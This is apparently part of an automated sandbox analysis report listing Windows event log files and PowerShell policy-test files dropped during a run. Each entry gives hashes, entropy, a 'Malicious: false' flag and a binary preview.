C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.528410746340457
Encrypted:	false
SSDEEP:	384:ShEKKeKSrlKvKe2KfKSKSMchY5MtYwMtYPMRYrJMRYgqMRYYqIMDH6MgMahMLMeB:SuWrGSqH1xh9AaBn
MD5:	21A71BAB626CE9549A5130786AB2B438
SHA1:	85364794F49109F65F2C3D4514C7EB2EB80F9EE5
SHA-256:	6A0BC7E6EC4A9DC7F1DAADFBBA1F374915F00F507A5356D1A8A6580679630B29
SHA-512:	729EF74AD8F80BCB444BE64F3FF005D751337B1E603AC8E476A34148B9C62E239BF87A4477E70ED4571F2AB2429F41FBE766630B1758B6B5BC742185F5B1BBCF
Malicious:	false
Preview:	ElfChnk.33......F3......33......F3..........P8..X;...idr..................................................................../.{p................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................%,......&.......................K.......................................................**......33..........a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1821673700851167
Encrypted:	false
SSDEEP:	384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmIUmxjUmLUmqU:sY7LR
MD5:	29F219BC8DD6F9B4D274CCF2D86ED277
SHA1:	EB6E9A1C7E994ECE135FC8D1EEF64DA7AB5E7214
SHA-256:	E11617EE20F013F6B979BF529CF6648BBC7386F7BFA50328711229A0DE2CAC19
SHA-512:	B5F4038905D6CFD84A698D6E52E960DC9E605A7C66085E6ECB5886F52BF24C20DECDE23F412B75DA05B5F5450EB6AA80C5F9B436F0468ACDA6AA4DCE1D35940D
Malicious:	false
Preview:	ElfChnk......................................1..04...V........................................................................6................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&......................................................................................................................*..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.20444044820186183
Encrypted:	false
SSDEEP:	48:MKdW1rP+yQNRBEZWTENO4bhBkcow/6zk:TNVaO8Mcow/6zk
MD5:	DD1B3B82CB152F6FC2121B14EF3A3255
SHA1:	A5F3EC17F63EE74FA5129E741DF72B3B8EF15A63
SHA-256:	FD1525A6AB0031025B1F75EDACA4109D1625114EC0ABF54D47BB7633922687E9
SHA-512:	2C355AEA32B361DADB45329C43345634841F034FA53EABBDDA9F27917C949BA633806E2E84B8D832FE1CF22DCB42B1D70EBE40955394483FAADE33BB5C98047F
Malicious:	false
Preview:	ElfChnk..............................................W.G.....................................................................y.T................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**.................5a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.0934111022900845
Encrypted:	false
SSDEEP:	384:phjivnniDiiuXieuietio0i7riTKhiIViOhin5ibaifiWipiUiKijiTVijiHiBRY:pon6ufC/hCI4MWs8PM9QSp
MD5:	C03DC232AFCDF6316B6CC7D1D5266423
SHA1:	8B90D640BB1B09E8C61117DE6B00B93CB1FE69A0
SHA-256:	198FDBBBC7444C323E7DBFB5B6D5B6AB870587FE7B740A05C22C6821B0508D16
SHA-512:	192E77738FC7A6493DFA22C5A56EA01E4A502219756578AE772C4FB0A1074617A21523D1029C6C9DDF15798D0968A0C14C8B723EAB0B91BD01F9967540C04DE9
Malicious:	false
Preview:	ElfChnk.y...............y....................x...z..D.......................................................................Hu...................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F....................................................................@...................#..................................w#.......'..............**......y........`0.Y...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Time-Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.257054806361608
Encrypted:	false
SSDEEP:	384:eGhecp/PpohCpPpaLpypDpWpywp7pdKpApWZqhpaepx2p8pEpSpWIN/pTp9EpSiI:hshamoZqP+INFaY9Ha
MD5:	8455BBE9A5FAF8DEA263FC999856A576
SHA1:	02E83723E5E95B2BB89D97D8B3E4B35D62551F40
SHA-256:	1B96AC0C736327A5C41EEBC411133B87A2A1173EBBBA10193B327A4EEA562AB2
SHA-512:	3E8B9C8790444ACB44B087B793A26A02C7359449620DD1C8A0A1D140A1BFD34A83827261B835C708E77FEB52F12445DEC79397048D4E7ACDA105461A5B174B25
Malicious:	false
Preview:	ElfChnk......................................r...t...u?........................................................................................6...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................y...........&........0...........%..........................a!..........!F..........................**..h..............7..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3930294391437794
Encrypted:	false
SSDEEP:	768:KcasFsaIa/a4aDaBa5aQa8aFBaOaVaea0aTaPaLaraXavarararajaLa/aParaHS:tF
MD5:	183376D4043464940E1EA869DF9F3D8F
SHA1:	77B5AC234FBFC3B6CC65B123586D2FD079426E4F
SHA-256:	3812F95695BBC3DEE0A47690EBC818494C1E2B14C19872D883A0F24AA550D33A
SHA-512:	37FBEDBC77A4848A54A16C450C38DDEE97F5C312BECD050153E9A24FD474213B0E580E0D1C59F3B6D662CF0FD1FCB6B2CE34D3440EC71BA4A9F1864390F2CB77
Malicious:	false
Preview:	ElfChnk.........@...............@...............h..............................................................................................h...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................A...................................**..P.............."a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4157482482643835
Encrypted:	false
SSDEEP:	384:8haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJgXJRpXJBgXJQXJBvXJnXJSc:8Q0yUkNYwD8imLEoRfBoYb5GO
MD5:	A886E83D1948FFB2BF4A2B744DDCCBD3
SHA1:	0074C53E8984FB0024DE0485447D3E1081B34D0B
SHA-256:	6DD70CE24E770699A142E13D62B090F64E00CD0A8501FC2D31E0ED5F9DFAB004
SHA-512:	3263F89608AEB4140553E587A3946E352391DAAC7DF85ABF0358A39B45103655DAE1DE29616A71142C4BB42FD1C0273F3E3B2F6900CCDE672F36ADBB3F7629D1
Malicious:	false
Preview:	ElfChnk......................................D...G..B.f......................................................................0.................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........3..................................................C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.342266575776689
Encrypted:	false
SSDEEP:	384:Chbm8mJmAwmsmkmtmZjm9mEJmSmSgmMmJmyFmgmPm4mOmdm9mHbkmzm7m6mBmdmv:CA74DcxI1c8PF
MD5:	302AE7C3FB3FBC33D19DBFB4CA97D867
SHA1:	86165BE8A181F1DE44CC86F75E36890C0379AB94
SHA-256:	1183791BE47DD2268E48827BC2B2F8D2F50C6265AF23904E15E35A8A4715B3DB
SHA-512:	AEE86973AE3C7844DF4EAA3406ECCF1AD59EF458F1623A35B84246B26C83229441B76C64A2502D2F9EF298DAF450D0069C6180A99B041A1D2B9DAD57B6F8A816
Malicious:	false
Preview:	ElfChnk......................................6..P8...P\<........................................................................................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........;...........+.......................................................**...............21.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.711346426112008
Encrypted:	false
SSDEEP:	192:7V7rDiDxFYzDiDPDiDfDiDDDiDxDiDUDiDgDiDsDiDQDiDEDiDYDiDEDiD:7hr2ts2T2z2n2N2w202w2M2Y2E2I2
MD5:	F911674F42FFA9096A39B15D79861134
SHA1:	14C46673DAB47906E3693ABC048CD0C2FADBECB6
SHA-256:	1668A045EF7528D741AAD61574F673D564D9BC7831A57FB6CD4A4D25C3FCA4B5
SHA-512:	2341C1145DCD1E714D0A16CFE517CCD8F0BF6F94A45882A4142B2D90B27A1ACD4F4508AF7E49A52B0B0F2E418EEC461EF2CBB0463D48CC48E08E6880A617B442
Malicious:	false
Preview:	ElfChnk................................................(....................................................................4.KU................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F...............................-...................................&...............................................................................**..............IL..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 12, DIRTY
Category:	dropped
Size (bytes):	76184
Entropy (8bit):	1.8279381649358473
Encrypted:	false
SSDEEP:	1536:dSpP9JcY6+g4+Ga6qSpP9JcY6+g4+Ga6:dSpP9JcY6+g4+Ga6qSpP9JcY6+g4+Ga6
MD5:	5B461594E7A8CE02FC51594F694DAEF3
SHA1:	17304262DE6BCE57CF775403F3244F859B12F445
SHA-256:	C26D8D89CCFEA45E5AED03C9D1B915EB389BFA37CFF5842C36E1904307A69640
SHA-512:	BCDCE253BE546BA269365401A3BFBD61648047C0151E5E44E510ACD1D42EF7BC5220324ED54E6D80D2253F141FBC9EB1B9451DCFCB7A4D99CD3F851B51C4E0FA
Malicious:	false
Preview:	ElfFile.....................................................................................................................[...ElfChnk......................................&...)...B......................................................................bj.H................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......n...............................................3...............................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8421011226942205
Encrypted:	false
SSDEEP:	384:NBh7RucVRDRbR2R3RgRxR5RrGRRrRuRVRERfRzRwRQRoRTyDR6RQR36RMGRPRHRN:NBNzUhK3K
MD5:	CBE3EA463793C0C7D5F322FB36092DB3
SHA1:	DFDC9C3FF6F3F3F087687057F0D1EE3486BF965B
SHA-256:	E0A4B5A04951BE1E30845CEE488F9431FB79B4F9E7A3E0BA2289D58E5DEBBD9F
SHA-512:	9367406E3843FBD3B587FF5F97470BD3685818B0BC8AAF25E4163B856F475881A24D6002C8E7147AEE80234D23902C9C187A48593125BE4C1A519BE985E57404
Malicious:	false
Preview:	ElfChnk.:.......v.......:.......v...............x.....y.....................................................................1..................................F.......\|...=.......................................`.......................u...-......................................................f...b..........?.......................`.......A.......G.......M...F.......................................................................................&...........9.......9.......................................*......:........._..........^..&........^..~.]i.../.l.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.260359446709512
Encrypted:	false
SSDEEP:	384:fhRhwhdhP0h9hzehShchawhZh4hhhshphihXhMhxhzhwhohGh5h3hShChWhzhLh4:fmFpkBzBiELmn
MD5:	067AD5BE5D9DAC2F9972EA7CCD899B43
SHA1:	EDD013A75A95D510CCEBA7DF86938621FA17E518
SHA-256:	EE5349F31C79D30F8AB2023451ECC640BD33C7F038ED6951D0F9FF2FE82BA0E7
SHA-512:	F2E20C281CD6E14FBDDCE8C89055CF5BC6A3C79E5D65037B269B11F2500E750A15998C9A29365F7D5903E4CF568EA45026E9F340A0318C212E8AD936EA2B3F65
Malicious:	false
Preview:	ElfChnk.........................................`...........................................................................3i._........................................@...=...........................................................................................................................f...............?...........................m...................M...F...........................................i.......................&.......................................................y.......................**................9.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2594795605878295
Encrypted:	false
SSDEEP:	384:LhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVHV7Vj0V1VXFVq:LyjbPac
MD5:	33C02B19501869BF7DF6F6BF1D2E6BF6
SHA1:	D90AF4BD50FE734A1E74ACC4E0704FEE1346F8D4
SHA-256:	6453729FD9D539566FC7AA3CE013B958C237E0E713AA917444F453C02A96F3BB
SHA-512:	B4D4A162E59651477CE87DE756F9DBD7634A206CA7FA83CA61DD73F86CAE343083AFF067A981DE096AAB1AE6997E599397E4851648800B2BCDAA6E5BAC0797A8
Malicious:	false
Preview:	ElfChnk........."..............."...........h8...9....?......................................................................Z..................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......&..............................................................................*..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.222652164441627
Encrypted:	false
SSDEEP:	384:v9hcBwBuBwB+BwBZwDIBwBoK/oyBwBY/puBwBN0bNoBwByQZBwBY/UUBwBY/5Bw9:FI0bDHrL
MD5:	D838A93C3849C253315B1DB18B3FEB4D
SHA1:	BC9CC30FE501246AD345EAF05E1EA42F3C9F740E
SHA-256:	F98D500A2CD43C26011B7A7CE47A42D9369788D614D21AE63BCC5C8D34AF297B
SHA-512:	C710E643CAF2B7C5F9E49A2B27D665512B650AE2489FF7A17A46955F4B38A81ECE885487EC34FADB528B98AA7746D11E4EA4CEFDF4CD6B9EC8557DC943F3DB3B
Malicious:	false
Preview:	ElfChnk.....................................H;..x>...r)........................................................................\............................................=...........................................................................................................................f...............?...........................m...................M...F...........................o.......................................&...............................................................................**..(...............`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.423183909657457
Encrypted:	false
SSDEEP:	384:/hGUEBUEYUEQUEhUE8UE5UE5UE8UExUEFUELUEVUEyUEXUEDUEuDUEBUEWUEzUE3:/P7s3NxG9
MD5:	718C0E7FA4C2A524A5FF961FEB987C13
SHA1:	73CB0C09C67332548F50613AA349E12695C715A2
SHA-256:	461F7778DD38ABE30403674C9E34EFF22F91AB7D4C207FB8CD2C4B31773588CC
SHA-512:	6A7705597D00B2193F3ECD79CDCD4B6D97DA36B879ECBC2E5F8EA3A8B77D9FA301B14E68BBB9ACBBF72B695DC83E66493F3C4D1DD94B1FC9D0E4ABA787BD853B
Malicious:	false
Preview:	ElfChnk.....................................0`...a.....r........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................A.......................**.................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69864
Entropy (8bit):	4.43673947502305
Encrypted:	false
SSDEEP:	384:qoHXZkoRonKodUoHX2oHX1moHXhhoHX5FRSBX2s7NloGMtUxboxMtf4oxMtuyox1:xkoY1i2P5If98FMWRkoY1uh
MD5:	57CA84239484AB59941749712FE42E4E
SHA1:	335BFFE00580DC02BEE072C0ABB417F286FBC51C
SHA-256:	ECA3A216EC776C1EA68B774BEE6DB6AF9820A0D416D3FCE3091D25A82DDAC4E0
SHA-512:	4DB5380E1FF8B3D27C07C9A0FF8EB1AAE9AB9267BC114FBDC5BC080E2E7A14DEFDB2C7C1E928D3661B1016E311A2A7C8F37A9EB6FCD7CA2A60CBBAE05926E9BE
Malicious:	false
Preview:	ElfChnk.........L.......".......m..................._........................................................................,?.........!.......z...s...h...................=...................................................N...............................................w.......<.......................5...................................c...........).......M...Z...:....................M.......S..S...............................V...kc..............................................................C^...7......**......g......................E!V...............................................................F.............!....6.......... .............n@......!.x.......g........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B.7......................N...........................................$.N......f.r.o.n.t.d.e.s.k...F.R.O.N.T.D.E.S.K.-.P.C...........M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.e.d.r.c.x.t.c.s.a.f.f.e.u.v

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4174142843031134
Encrypted:	false
SSDEEP:	384:zFRX2HrBwjhdGqpfv/wP+SvHsX2Imjo6bPwtrQMUU5963XRs+5dXNlZnEi8B98IB:ZSY84iLQraN3HpRAtF
MD5:	B16E7F09C9DF10A688C23F22DD9684E0
SHA1:	95B26B61C91CC2D5CC4238F3945082B2C91972FE
SHA-256:	91FE00F48174741287A7D0147406674C58B01276CDD9730C16A413B3F65B5A65
SHA-512:	0B65279EBC03D8B78485FEA762F72AD95C92FB221E637DAA5DFEEBB7F321C04C86E90785F926EBC6D2594811379EDE46951C0EF5D6A3673CE777E6BCEABF0151
Malicious:	false
Preview:	ElfChnk......................................$...'...T.Q......................................................................5....................s...h...............%...=...................................................N...............................................w.......8.......................M..................................._...........).......M...;...:...........................................................y...........=............%......................&.......................&........ ..**..H.............K...........v..&........v..Tr].4....E.C.......A..7...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....`...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	191624
Entropy (8bit):	3.7345642572258706
Encrypted:	false
SSDEEP:	3072:OXnnkFQ+w8MXnnkFQ+w8+XnnkFQ+w8oXnnkFQ+w86XnnkFQ+w8fXnnkFQ+w8MXnR:OXnnkFQ+w8MXnnkFQ+w8+XnnkFQ+w8oa
MD5:	8E35D70FDB81CB899038644C2E4F6A0B
SHA1:	4807E48A234AFBE7651F5D0BC41ED62235401B4A
SHA-256:	67826F63323409FAA291A605F4137B94E8A6BDDE058B15ABDD977633F576A1A4
SHA-512:	9BE659961A77099AD91FED2684DDA0E6DC22746E3EA4D1A0C2B51EED8908D6D991EA60CFEB5D2889B8DB5A880A0473A0BAF4270FA1A8602CAF2C7DA197B5A1D6
Malicious:	false
Preview:	ElfChnk.....................................h.......k..-.......................................................................G............................................=..........................................................................................................................._...............8...........................f...................M...c...........................v.......................................................................................&...............................**...3............f..........L.-9&.......L.-9...P..K`..$5........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_aogfxtpp.4fi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_pvursesw.30i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
